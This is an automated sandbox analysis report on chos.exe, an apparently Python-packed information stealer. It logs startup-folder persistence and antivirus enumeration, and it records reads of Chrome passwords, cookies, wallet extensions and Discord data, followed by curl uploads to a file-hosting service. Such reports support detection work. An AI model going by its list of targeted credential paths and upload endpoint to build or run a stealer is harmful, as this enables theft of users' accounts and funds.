Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI98882\setuptools VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI98882\setuptools\_vendor VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI98882\setuptools\_vendor VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI98882\setuptools VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI98882\setuptools VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI98882\setuptools VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI98882\setuptools\_vendor VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI98882\setuptools VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI98882\setuptools VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI98882\setuptools\_vendor VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI98882\setuptools VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI98882\setuptools\_vendor VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI98882\setuptools VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI98882\setuptools\_vendor VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI98882\setuptools\_vendor\wheel-0.43.0.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI98882\setuptools VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\chos.exe

Code function: 0_2_00007FF666DDD080 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00007FF666DDD080

Source: C:\Users\user\Desktop\chos.exe

Code function: 0_2_00007FF666DF5C70 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,

0_2_00007FF666DF5C70

Source: C:\Windows\System32\curl.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

Stealing of Sensitive Information

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome SxS\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Bookmarks	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome SxS\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome SxS\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior

Tries to steal communication platform credentials (via file / registry access)

Source: C:\Users\user\Desktop\chos.exe	File opened: C:\Users\user\AppData\Local\Discord	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	File opened: C:\Users\user\AppData\Local\DiscordCanary	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	File opened: C:\Users\user\AppData\Local\DiscordPTB	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	File opened: C:\Users\user\AppData\Local\DiscordDevelopment	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File opened: C:\Users\user\AppData\Local\Discord	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File opened: C:\Users\user\AppData\Local\DiscordCanary	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File opened: C:\Users\user\AppData\Local\DiscordPTB	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File opened: C:\Users\user\AppData\Local\DiscordDevelopment	Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Windows Management Instrumentation	12 Registry Run Keys / Startup Folder	11 Process Injection	1 Masquerading	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Email Collection	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	12 Registry Run Keys / Startup Folder	11 Process Injection	LSASS Memory	31 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	1 Data from Local System	3 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Obfuscated Files or Information	NTDS	1 System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	24 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
chos.exe	37%	ReversingLabs	Win64.Trojan.Generic
chos.exe	100%	Avira	TR/ATRAPS.Gen

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_ARC4.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_Salsa20.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_chacha20.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_pkcs1_decode.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_raw_aes.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_raw_aesni.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_raw_arc2.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_raw_blowfish.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_raw_cast.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_raw_cbc.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_raw_cfb.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_raw_ctr.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_raw_des.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_raw_des3.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_raw_ecb.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_raw_eksblowfish.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_raw_ocb.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_raw_ofb.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Hash\_BLAKE2b.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Hash\_BLAKE2s.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Hash\_MD2.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Hash\_MD4.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Hash\_MD5.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Hash\_RIPEMD160.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Hash\_SHA1.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Hash\_SHA224.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Hash\_SHA256.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Hash\_SHA384.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Hash\_SHA512.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Hash\_ghash_clmul.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Hash\_ghash_portable.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Hash\_keccak.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Hash\_poly1305.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Math\_modexp.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Protocol\_scrypt.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\PublicKey\_curve25519.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\PublicKey\_curve448.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\PublicKey\_ec_ws.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\PublicKey\_ed25519.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\PublicKey\_ed448.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Util\_cpuid_c.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Util\_strxor.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74682\VCRUNTIME140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74682\VCRUNTIME140_1.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74682\_asyncio.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74682\_bz2.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74682\_cffi_backend.cp313-win_amd64.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74682\_ctypes.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74682\_decimal.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74682\_hashlib.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74682\_lzma.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74682\_multiprocessing.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74682\_overlapped.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74682\_queue.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74682\_socket.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74682\_sqlite3.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74682\_ssl.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74682\_uuid.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74682\_wmi.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74682\charset_normalizer\md.cp313-win_amd64.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74682\charset_normalizer\md__mypyc.cp313-win_amd64.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74682\cryptography\hazmat\bindings\_rust.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74682\libcrypto-3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74682\libffi-8.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74682\libssl-3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74682\pyexpat.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74682\python3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74682\python313.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74682\select.pyd	0%	ReversingLabs

Source	Detection	Scanner	Label
https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packagesr:r;Nr	0%	Avira URL Cloud	safe
http://cacerts.digD	0%	Avira URL Cloud	safe
https://urllib3.rQ	0%	Avira URL Cloud	safe
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsN	0%	Avira URL Cloud	safe
http://hg.python.or	0%	Avira URL Cloud	safe
https://www-cs-faculty.stanford.edu/~knuth/fasc2a.ps.gz	0%	Avira URL Cloud	safe
https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packagesr:	0%	Avira URL Cloud	safe
https://store4.gofile.io.uploadFile	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
store4.gofile.io	31.14.70.245	true	false	high
discord.com	162.159.138.232	true	false	high
api.ipify.org	104.26.12.205	true	false	high
geolocation-db.com	159.89.102.253	true	false	high
api.gofile.io	45.112.123.126	true	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packagesr:r;Nr	chos.exe, 00000002.00000003.1463557293.00000159557A1000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1464049106.00000159557E0000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1463557293.00000159557E0000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1683693472.00000211B7CEA000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1683693472.00000211B7CAB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://store4.gofile.io/uploadFilelesCommonProgramFiles(x86)=C:	cmd.exe, 0000002F.00000002.1912110090.00000263A5EEB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/astral-sh/ruff	chos.exe, 0000000A.00000003.1664958699.00000243B8846000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/python/importlib_metadata/actions/workflows/main.yml/badge.svg	chos.exe, 0000000A.00000003.1664958699.00000243B8846000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/python/importlib_metadata	chos.exe, 0000000A.00000003.1664958699.00000243B8846000.00000004.00000020.00020000.00000000.sdmp	false		high
https://img.shields.io/endpoint?url=https://raw.githubusercontent.com/charliermarsh/ruff/main/assets	chos.exe, 0000000A.00000003.1664958699.00000243B8846000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/python/importlib_metadata/issues	chos.exe, 0000000A.00000003.1664958699.00000243B8846000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/pyca/cryptography/actions?query=workflow%3ACI	chos.exe, 00000000.00000003.1436317355.0000018B76865000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.1653929981.00000243B8846000.00000004.00000020.00020000.00000000.sdmp	false		high
https://packaging.python.org/en/latest/specifications/recording-installed-packages/#the-record-file	chos.exe, 00000011.00000003.1703493750.00000211B7FB5000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1740812158.00000211B7F9A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store4.gofile.io/uploadFileE_STRI	cmd.exe, 0000000B.00000002.1654909983.000001B935030000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.1874357586.000001F529500000.00000004.00000020.00020000.00000000.sdmp	false		high
https://importlib-metadata.readthedocs.io/	chos.exe, 0000000A.00000003.1664958699.00000243B8846000.00000004.00000020.00020000.00000000.sdmp	false		high
https://tools.ietf.org/html/rfc2388#section-4.4	chos.exe, 00000011.00000003.1703493750.00000211B80F1000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1740812158.00000211B80B9000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.apache.org/licenses/LICENSE-2.0	chos.exe, 00000000.00000003.1440271500.0000018B76870000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.1654672093.00000243B8843000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.1654867803.00000243B8851000.00000004.00000020.00020000.00000000.sdmp	false		high
https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64	chos.exe, 00000002.00000003.1478340357.00000159554E7000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1475894863.00000159554F4000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1471717663.000001595555C000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1477382744.00000159554E8000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1473331391.0000015955563000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1475182879.00000159554E7000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1464161587.0000015955561000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1466781370.00000159554F6000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1474442517.00000159554F6000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1479078693.00000159554EC000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1476788640.00000159554E7000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1472058557.00000159554F6000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1464863437.0000015955567000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1686397139.00000211B7B50000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store4.gofile.io/uploadFileB	curl.exe, 00000009.00000002.1627146371.000001791A2F0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://packaging.python.org/en/latest/specifications/entry-points/#file-format	chos.exe, 00000011.00000003.1703493750.00000211B7FB5000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1740812158.00000211B7F9A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://readthedocs.org/projects/importlib-metadata/badge/?version=latest	chos.exe, 0000000A.00000003.1664958699.00000243B8846000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store4.gofile.io/uploadFileRIe	cmd.exe, 0000000E.00000002.1682888587.000001376ACB0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store4.gofile.io/uploadFile;	curl.exe, 00000031.00000002.1909714243.0000028AD0A71000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store4.gofile.io/uploadFile:	curl.exe, 00000010.00000002.1681576960.000001DB46B78000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store4.gofile.io/uploadFilecnwT	curl.exe, 00000009.00000002.1627146371.000001791A301000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store4.gofile.io/uploadFile=	curl.exe, 00000031.00000002.1909714243.0000028AD0A71000.00000004.00000020.00020000.00000000.sdmp	false		high
http://cacerts.digi	chos.exe, 00000000.00000002.1897980712.0000018B7686F000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000000.00000003.1428724868.0000018B76862000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.1645041537.00000243B8850000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.2119017318.00000243B8850000.00000004.00000020.00020000.00000000.sdmp	false		high
https://blog.jaraco.com/skeleton	chos.exe, 0000000A.00000003.1664958699.00000243B8846000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store4.gofile.io/uploadFileil	curl.exe, 00000010.00000002.1681576960.000001DB46B78000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store4.gofile.io/uploadFile2	curl.exe, 0000000D.00000002.1653713527.000001C952E13000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store4.gofile.io/uploadFileSTRI	cmd.exe, 00000007.00000002.1628261798.00000160E36C0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://peps.python.org/pep-0205/	chos.exe, 00000002.00000003.1454831606.0000015955021000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1684253672.00000211B7C23000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1671407326.00000211B77D1000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store4.gofile.io/uploadFileWinsta0	curl.exe, 00000009.00000002.1627146371.000001791A2F0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000002.1653713527.000001C952E00000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000010.00000002.1681576960.000001DB46B70000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.dhimyotis.com/certignarootca.crl	chos.exe, 00000011.00000003.1740812158.00000211B7F9A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store4.gofile.io/uploadFile6	curl.exe, 00000010.00000003.1680521172.000001DB46BB4000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000010.00000003.1679836877.000001DB46BB3000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000010.00000002.1681979811.000001DB46BB4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packagesr:	chos.exe, 00000002.00000003.1463557293.00000159557A1000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1464049106.00000159557E0000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1463557293.00000159557E0000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1683693472.00000211B7CEA000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1683693472.00000211B7CAB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://store4.gofile.io/uploadFilerHw	cmd.exe, 0000000B.00000002.1654510529.000001B934D32000.00000004.00000020.00020000.00000000.sdmp	false		high
https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename	chos.exe, 00000011.00000003.1674571294.00000211B77F5000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1680761245.00000211B77FD000.00000004.00000020.00020000.00000000.sdmp	false		high
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy	chos.exe, 00000011.00000003.1703174546.00000211B826C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688	chos.exe, 00000002.00000003.1475946213.000001595504E000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1459809442.0000015955050000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1462947420.0000015955051000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1460938016.0000015955051000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store4.gofile.io/uploadFilee28	curl.exe, 00000010.00000002.1681576960.000001DB46B70000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store4.gofile.io/uploadFileuQUT	curl.exe, 00000009.00000002.1627252326.000001791A333000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000003.1626937486.000001791A333000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000003.1626823097.000001791A332000.00000004.00000020.00020000.00000000.sdmp	false		high
https://httpbin.org/get	chos.exe, 00000011.00000003.1741361132.00000211B81C8000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1740812158.00000211B80B9000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1738579625.00000211B81AA000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store4.gofile.io/uploadFileal5	curl.exe, 00000010.00000002.1681576960.000001DB46B78000.00000004.00000020.00020000.00000000.sdmp	false		high
